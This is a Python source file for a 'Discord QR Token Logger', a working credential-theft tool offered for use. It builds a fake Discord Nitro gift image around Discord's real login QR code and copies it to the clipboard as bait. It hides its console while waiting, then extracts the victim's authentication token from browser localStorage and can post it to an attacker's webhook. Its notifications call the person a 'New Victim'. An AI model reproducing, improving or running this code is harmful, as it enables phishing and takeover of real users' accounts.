2023-02-02 14:23:04 +02:00

210 lines
8.9 KiB
Python

"""
Discord QR Token Logger
-----------------------
Generates a Discord Nitro bait image with a QR code that will prompt a user to login.
If the user logs in, their authentication token will be displayed to the console.
Optionally, the user's authentication token may also be sent to a Discord channel via a webhook.
LICENSE
The actual repository is unlicensed, it mean all rights are reserved. You cannot modify or redistribute this code without explicit permission from the copyright holders.
Violating this rule may lead our intervention according to the Github Terms of Service — User-Generated Content — Section D.3 using the Content Removal Policies — DMCA Takedown Policy.
CREDITS
Lemon.-_-.#3714
Luci (9P9)
the-cult-of-integral
mte0
"""
import base64
import ctypes
import os
import time
import win32clipboard
from io import BytesIO
from logging import ERROR
from tempfile import NamedTemporaryFile, TemporaryDirectory
from threading import Thread, Event
from bs4 import BeautifulSoup
from PIL import Image
from pystray import Icon, Menu, MenuItem
from pystyle import Box, Center, Colorate, Colors, System, Write
from selenium import webdriver
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.chrome.service import Service
from constants import BANNER, PYSTRAY_IMG, SLEEP_TIME
from discord_token import QRGrabber, TokenInfo
from exceptions import InvalidToken, QRCodeNotFound, WebhookSendFailure
from queue import Queue
from signal import SIGTERM
from logger import log_unknown_exceptions
@log_unknown_exceptions(ERROR)
def main(webhook_url: str) -> None:
#The main function of the program.
Write.Print('\n\n[!] Generating QR code...', Colors.red_to_purple)
opts = webdriver.ChromeOptions()
opts.add_argument('--headless')
opts.add_experimental_option('detach', True)
opts.add_experimental_option('excludeSwitches', ['enable-logging'])
opts.add_argument('--log-level 3')
# This module have conflicts with PyStyle; importing here prevents the issue.
from webdriver_manager.chrome import ChromeDriverManager
os.environ['WDM_PROGRESS_BAR'] = str(0)
os.environ['WDM_LOG_LEVEL'] = '0'
try:
main.driver = webdriver.Chrome(
service=Service(ChromeDriverManager().install()),
options=opts)
except WebDriverException:
raise SystemExit(
'WebDriverException : have you tried installing the latest version of Google Chrome?')
main.driver.implicitly_wait(5)
main.driver.get('https://discord.com/login')
# Attempted to do this with WebDriverWait but it resulted in a fail.
time.sleep(5)
source = BeautifulSoup(main.driver.page_source, features='html.parser')
qrg = QRGrabber('resources')
try:
qr_code = qrg.get_qr_from_source(source)
except QRCodeNotFound as e:
main.driver.service.process.send_signal(SIGTERM)
raise SystemExit(e)
discord_login = main.driver.current_url
with TemporaryDirectory(dir='.') as td:
with NamedTemporaryFile(dir=td, suffix='.png') as tp1:
tp1.write(
base64.b64decode(
qr_code.replace('data:image/png;base64,','')))
Write.Print('\n[!] Generating template for QR code...', Colors.red_to_purple)
with NamedTemporaryFile(dir=td, suffix='.png') as tp2:
qrg.generate_qr_for_template(tp1, tp2)
Write.Print('\n[!] Generating Discord Nitro template for QR code...',
Colors.red_to_purple)
qrg.generate_nitro_template(tp2)
output = BytesIO()
Image.open("discord_gift.png").convert('RGB').save(output, 'BMP')
data = output.getvalue()[14:]
output.close()
win32clipboard.OpenClipboard(), win32clipboard.EmptyClipboard()
win32clipboard.SetClipboardData(win32clipboard.CF_DIB, data)
win32clipboard.CloseClipboard()
Write.Print(
'\n[#] The Qr-Code is copied to clipboard, waiting for target to login using the QR code...',
Colors.red_to_purple)
pystray_icon.icon.notify("This script has been set to hide until the target's token is grabbed.",
'Waiting for target')
time.sleep(3)
ctypes.windll.user32.ShowWindow(
ctypes.windll.kernel32.GetConsoleWindow(), 0)
def timer_killer(q, e):
while True:
if e.isSet() != True:
if discord_login != main.driver.current_url:
try:
os.remove('discord_gift.png')
except BaseException:
pass
token = main.driver.execute_script('''
window.dispatchEvent(new Event('beforeunload'));
let iframe = document.createElement('iframe');
iframe.style.display = 'none';
document.body.appendChild(iframe);
let localStorage = iframe.contentWindow.localStorage;
var token = JSON.parse(localStorage.token);
return token;
''')
q.put(token)
break
else:
break
main.driver.service.process.send_signal(SIGTERM)
q, e = Queue(), Event()
thread_timer_killer = Thread(target=timer_killer, args=(q, e, ))
thread_timer_killer.start()
thread_timer_killer.join(120)
if thread_timer_killer.is_alive():
e.set()
while thread_timer_killer.is_alive():
continue
main.driver.service.process.send_signal(SIGTERM)
try:
os.remove('discord_gift.png')
except BaseException:
pass
pystray_icon.icon.notify("The Qr-Code has expired !", 'Exiting...')
time.sleep(3)
ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 5)
raise SystemExit(Write.Print('\n\n[!] The Qr-Code have expired, exiting...', Colors.yellow_to_green))
pystray_icon.icon.notify("The target scanned the QR-code sucessfuly.", 'New Victim !')
time.sleep(3)
ctypes.windll.user32.ShowWindow(ctypes.windll.kernel32.GetConsoleWindow(), 5)
try:
token_info = TokenInfo(q.get())
Write.Print(f"\n\n[?] The following token has been grabbed: {token_info.token}", Colors.rainbow)
if webhook_url is not None:
try:
token_info.send_info_to_webhook(webhook_url)
except WebhookSendFailure as e:
Write.Print(f"[!] {e}", Colors.red)
Write.Input('\n\n[*] Press ENTER to quit.', Colors.blue_to_green)
except InvalidToken:
Write.Print('\n\n[!] An invalid token has been accessed.', Colors.yellow_to_green)
if __name__ == "__main__":
@log_unknown_exceptions(ERROR)
def pystray_icon():
def window_state(_, item):
if str(item) == 'Show':
return ctypes.windll.user32.ShowWindow(
ctypes.windll.kernel32.GetConsoleWindow(), 5)
elif str(item) == 'Hide':
return ctypes.windll.user32.ShowWindow(
ctypes.windll.kernel32.GetConsoleWindow(), 0)
elif str(item) == 'Quit':
pystray_icon.icon.stop()
try:
main.driver.service.process.send_signal(SIGTERM)
except:
pass
raise SystemExit
pystray_icon.icon = Icon('QR_DTG', Image.open(BytesIO(base64.b64decode(PYSTRAY_IMG))), menu=Menu(
MenuItem('Show', window_state),
MenuItem('Hide', window_state),
MenuItem('Quit', window_state)
))
pystray_icon.icon.run()
System.Title('QR DISCORD LOGIN - By Lemon.-_-.#3714, Luci (9P9), the-cult-of-integral and mte0')
System.Size(140, 35)
print(Colorate.Horizontal(Colors.cyan_to_green, Center.XCenter(BANNER), 1))
print(Colorate.Horizontal(Colors.rainbow, Center.GroupAlign(Box.DoubleCube(
"By Lemon.-_-.#3714, Luci (9P9), the-cult-of-integral and mte0")), 1))
print(Colorate.Horizontal(Colors.rainbow, Box.Lines(
"https://github.com/9P9/Discord-QR-Token-Logger").replace('', "$"), 1), "\n")
confir = Write.Input(
"[*] Do you want to use a Discord Webhook URL ? [y/n] -> ",
Colors.green_to_cyan,
interval=0.01).lower()
if confir == "yes" or confir == "y":
th_main = Thread(
target=main,
args=(
Write.Input("\n[*] Enter your webhook url -> ",
Colors.green_to_cyan,
interval=0.01),
))
elif confir == "no" or confir == "n":
th_main = Thread(target=main, args=(None,))
else:
raise SystemExit(Write.Print(
'Failed to recognise an input of either \'y\' or \'n\'.',
Colors.yellow_to_green))
Thread(target=pystray_icon).start()
th_main.start()
while th_main.is_alive():
time.sleep(SLEEP_TIME)
pystray_icon.icon.stop()